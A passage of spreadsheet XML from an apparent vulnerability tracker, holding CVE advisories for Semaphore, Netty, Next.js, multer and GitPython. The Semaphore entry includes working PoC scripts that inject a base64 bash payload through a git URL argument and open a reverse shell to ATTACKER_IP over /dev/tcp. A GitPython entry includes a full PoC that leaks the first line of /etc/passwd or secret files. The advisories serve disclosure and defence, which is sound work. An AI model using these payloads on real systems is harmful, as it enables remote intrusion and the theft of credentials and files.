A project schedule with a repository_id causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repository_id and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.
### Entry points:
POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).
# PoC
Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and non_admin_can_create_project: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).
### Terminal 1 — config + users + server
```
  cd ~/PoC &amp;&amp; mkdir -p tmp
  cat &gt; config.json &lt;&lt;EOF
  { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmp_path":"$PWD/tmp",
    "port":":3000","interface":"127.0.0.1",
    "cookie_hash":"$(head -c32 /dev/urandom|base64)","cookie_encryption":"$(head -c32 /dev/urandom|base64)",
    "access_key_encryption":"$(head -c32 /dev/urandom|base64)","git_client":"cmd_git",
    "non_admin_can_create_project":false,"web_host":"http://127.0.0.1:3000/" }
  EOF
  ./semaphore user add --admin --login admin  --name Admin --email admin@example.com --password 'Admin123!'  --config config.json
  ./semaphore user add        --login lowpriv --name Low   --email low@example.com   --password 'LowPriv123!' --config config.json
  ./semaphore server --config config.json
```
### Terminal 2 — attacker listener
```
  nc -lvnp 4444
```
### Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits
```
  cd ~/PoC
  cat &gt; onboard.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"
  ADMIN="${ADMIN:-admin}"; ADMIN_PASS="${ADMIN_PASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}"
  JAR=$(mktemp)
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMIN_PASS\"}" &gt;/dev/null
  PROJ_PID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \
    -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
  USER_ID=$(curl -s -b "$JAR" "$BASE/api/users" | \
    python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))")
  curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJ_PID/users" -H 'Content-Type: application/json' \
    -d "{\"user_id\":$USER_ID,\"role\":\"manager\"}" -o /dev/null
  rm -f "$JAR"; echo "[*] $MEMBER is Manager of project $PROJ_PID" &gt;&amp;2; echo "$PROJ_PID"
  EOF
  chmod +x onboard.sh
  cat &gt; rce.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}"
  PROJ_PID="${PROJ_PID:?set PROJ_PID from onboard.sh}"
  CMD="$*"; B64=$(printf '%s' "$CMD" | base64 -w0)
  GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true"
  JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; }
  post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; }
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" &gt;/dev/null
  KID=$(post /api/project/$PROJ_PID/keys "{\"name\":\"k\",\"type\":\"none\",\"project_id\":$PROJ_PID}" | jid)
  BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','project_id':$PROJ_PID,'git_url':sys.argv[1],'git_branch':'master','ssh_key_id':$KID}))" "$GITURL")
  RID=$(post /api/project/$PROJ_PID/repositories "$BODY" | jid)
  TID=$(post /api/project/$PROJ_PID/templates "{\"name\":\"t\",\"project_id\":$PROJ_PID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repository_id\":$RID,\"type\":\"\"}" | jid)
  post /api/project/$PROJ_PID/schedules "{\"name\":\"s\",\"project_id\":$PROJ_PID,\"template_id\":$TID,\"repository_id\":$RID,\"cron_format\":\"* * * * *\"}" &gt;/dev/null
  rm -f "$JAR"; echo "[*] queued as lowpriv (Manager of $PROJ_PID): $CMD"
  EOF
  chmod +x rce.sh
  PROJ_PID=$(./onboard.sh)
  ATTACKER_IP=127.0.0.1
  PROJ_PID=$PROJ_PID ./rce.sh "bash -i &gt;&amp; /dev/tcp/$ATTACKER_IP/4444 0&gt;&amp;1"
```
Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own access_key_encryption master key).
# Impact
- Type: OS command injection via argument injection — remote code execution.
- Who is impacted: any Semaphore deployment running the default git_client: cmd_git. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If non_admin_can_create_project is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)</t>
        </is>
      </c>
      <c r="T1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="D1037" s="5" t="inlineStr"/>
      <c r="E1037" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1037" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr">
        <is>
          <t>Maven:io.netty:netty-handler</t>
        </is>
      </c>
      <c r="M1037" s="5" t="inlineStr">
        <is>
          <t>4.1.137.Final, 4.2.17.Final</t>
        </is>
      </c>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1037" s="5" t="inlineStr"/>
      <c r="R1037" s="5" t="inlineStr"/>
      <c r="S1037" s="5" t="inlineStr">
        <is>
          <t>### Summary
A fragmented TLS ClientHello whose handshake header spans multiple records makes Netty silently fall back to the default SslContext; where per-SNI selection is the sole mTLS gate, an unauthenticated attacker can bypass the route's mTLS requirement.
### Details
In `io.netty.handler.ssl.SslClientHelloHandler#decode` the guard that should wait for the 4-byte handshake header checks the wrong offset - it ignores the 5-byte record header that precedes it - and therefore never fires:
```java
if (handshakeLength == -1) {
    if (readerIndex + 4 &gt; endOffset) {
        // Need more data to read HandshakeType and handshakeLength (4 bytes)
        return;
    }
```
When the first record's payload is &lt; 4 bytes, `handshakeLength = in.getUnsignedMedium(readerIndex + SslUtils.SSL_RECORD_HEADER_LENGTH + 1);` leads to `IndexOutOfBoundsException `. That is caught by the generic `catch (Exception)` block, which calls `select(ctx, null)` - this is the default `SslContext`. Fallback to default on parse failure is a problem when per-SNI selection is the sole mTLS gate.
### Impact
SNI routing bypass. Escalates to an unauthenticated mTLS bypass only when:
- mTLS is enforced solely via per-SNI SslContext (clientAuth=REQUIRE)
- the default/fallback SslContext is permissive (clientAuth=NONE/OPTIONAL)
- no secondary peer-certificate verification exists at the application layer.</t>
        </is>
      </c>
      <c r="T1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="D1038" s="5" t="inlineStr"/>
      <c r="E1038" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M1038" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1038" s="5" t="inlineStr"/>
      <c r="R1038" s="5" t="inlineStr"/>
      <c r="S1038" s="5" t="inlineStr">
        <is>
          <t>## Impact
A vulnerability in applications using Pages and App router without Cache Component can lead to remote code execution when the server is hosted on machines using a Windows filesystem.
## Workaround
There is no known workaround for affected windows-hosted applications. You should upgrade immediately if your server is hosted on Windows.</t>
        </is>
      </c>
      <c r="T1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77037</t>
        </is>
      </c>
      <c r="D1039" s="5" t="inlineStr"/>
      <c r="E1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1039" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1039" s="5" t="inlineStr"/>
      <c r="R1039" s="5" t="inlineStr"/>
      <c r="S1039" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability in multer `2.2.0` allows an attacker to trigger a Denial of Service (DoS) by aborting or truncating multipart uploads. When using `diskStorage`, the destination write stream is not closed if the upload is aborted before it finishes, so each failed request leaks an open file descriptor and retains its disk blocks until the process exits. Repeated failed uploads can exhaust the available file descriptors. All applications using multer's disk storage are affected.
### Patches
Users should upgrade to `2.3.0`.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77078</t>
        </is>
      </c>
      <c r="D1040" s="5" t="inlineStr"/>
      <c r="E1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1040" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1040" s="5" t="inlineStr"/>
      <c r="R1040" s="5" t="inlineStr"/>
      <c r="S1040" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability in multer allows a remote, unauthenticated attacker to crash the Node.js process with a single `multipart/form-data` request. Two specially crafted text field names cause an uncaught `RangeError: Invalid array length` inside multer's field parsing, which is not routed to the application error handler and terminates the process. All applications using multer to parse multipart requests are affected.
### Patches
Users should upgrade to `2.3.0`.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78675</t>
        </is>
      </c>
      <c r="D1041" s="5" t="inlineStr"/>
      <c r="E1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr"/>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1041" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1041" s="5" t="inlineStr"/>
      <c r="R1041" s="5" t="inlineStr"/>
      <c r="S1041" s="5" t="inlineStr">
        <is>
          <t># [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)
- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)
- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)
## Reachability
`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` ("Disable merge_includes in config writers"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).
That fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.
`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.
Once opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `"File contains no section headers.\nfile: %r, line: %d\n%r" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.
## Root cause
Parity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules/&lt;name&gt;/config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)
## Exploit path
1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:
   ```
   [include]
   	path = /etc/passwd
   ```
   (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).
2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.
3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.
4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).
## Impact
Non-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` ("Blind local file inclusion", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).
## Preconditions
- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, "audit this repo" utilities — exactly the class of application GitPython itself is built for).
- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.
- No authentication/role requirement inside GitPython itself.
## Evidence
- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.
- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.
- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.
- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.
- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.
- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.
## False-positive check (adversarial re-read)
- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).
- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.
- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.
- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.
## Remediation
Pass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.
## Confidence
High. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).
## Proof-of-Concept source (`gitpython-003-poc.py`)
```python
#!/usr/bin/env python3
"""
GITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped
inside a cloned repository -- can contain `[include] path = &lt;any local path&gt;`.
`Submodule._config_parser()` builds the parser used for `repo.submodules` (and
other submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`
without passing `merge_includes=False`, so the class default `merge_includes=True`
is inherited. GitConfigParser then opens the target file; if it isn't valid
git-config syntax (true of virtually any non-gitconfig file), Python's
`configparser.MissingSectionHeaderError` embeds the file's first line verbatim
in its exception message, which propagates out of the ordinary, read-only
`repo.submodules` call -- a non-blind local file content disclosure primitive.
Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-003-poc.py &lt;workdir&gt; &lt;target-file&gt;
Benign: reads only the given &lt;target-file&gt; (defaults to a throwaway secret file
created under &lt;workdir&gt; if omitted) and never writes/exfiltrates it anywhere
except printing it locally to prove the primitive. No destructive action.
"""
import os
import subprocess
import sys
def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-003-poc"
    target_file = sys.argv[2] if len(sys.argv) &gt; 2 else os.path.join(workdir, "secret.txt")
    attacker_repo = os.path.join(workdir, "attacker-repo")
    dest = os.path.join(workdir, "dest")
    for p in (attacker_repo, dest):
        os.makedirs(p, exist_ok=True)
    if not os.path.exists(target_file):
        os.makedirs(os.path.dirname(target_file), exist_ok=True)
        with open(target_file, "w") as f:
            f.write("TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\n")
    subprocess.run(["git", "init", "-q", "-b", "main", attacker_repo], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.email", "a@example.com"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.name", "Attacker"], check=True)
    with open(os.path.join(attacker_repo, "file.txt"), "w") as f:
        f.write("hello\n")
    with open(os.path.join(attacker_repo, ".gitmodules"), "w") as f:
        f.write(
            '[submodule "totally-normal-dep"]\n'
            "\tpath = vendor/dep\n"
            "\turl = https://example.com/dep.git\n"
            "[include]\n"
            "\tpath = %s\n" % target_file
        )
    subprocess.run(["git", "-C", attacker_repo, "add", "file.txt", ".gitmodules"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "commit", "-q", "-m", "init"], check=True)
    import git  # gitpython under test
    import configparser
    repo = git.Repo.clone_from(attacker_repo, dest)
    try:
        subs = list(repo.submodules)
        print("NOT VULNERABLE: no exception raised, submodules =", subs)
        sys.exit(1)
    except configparser.MissingSectionHeaderError as e:
        msg = str(e)
        print("VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:")
        print(msg)
        with open(target_file) as f:
            first_line = f.readline().rstrip("\n")
        if first_line in msg:
            print("Confirmed: target file's first line is present verbatim in the exception message.")
            sys.exit(0)
        else:
            print("NOT VULNERABLE: exception message did not contain the expected content")
            sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78676</t>
        </is>
      </c>
      <c r="D1042" s="5" t="inlineStr"/>
      <c r="E1042" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1042" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1042" s="5" t="inlineStr"/>
      <c r="R1042" s="5" t="inlineStr"/>
      <c r="S1042" s="5" t="inlineStr">
        <is>
          <t>- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument
- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)
## Reachability
GitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\r`/`\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.
